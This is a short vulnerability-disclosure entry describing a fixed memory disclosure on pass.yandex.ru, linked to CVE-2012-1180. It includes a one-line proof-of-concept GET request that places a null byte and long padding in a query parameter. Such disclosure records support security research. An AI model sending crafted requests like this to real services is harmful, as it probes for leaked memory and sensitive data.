Main / Vulnerabilities / pass.yandex.ru / BC#30

BC #30 - [Fixed] memory disclosure on pass.yandex.ru

Description Memory disclosure with specially crafted backend responses (CVE-2012-1180)

PoC:
GET /?retpath=http://clubs.ya.ru&clean=yes%00AAAAAAAA.....AAAAAAAAAAAAAAAAA HTTP/1.1
Host: pass.yandex.ru
Founded 2012-12-24
Exploit http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1180
Video N/A

* only for registered users

Created at 01 Oct'2013 04:07:45 | BlackFan | 1835

Comments

No comments right now. Be first!
Leave comment as guest (email/website/twitter will be public)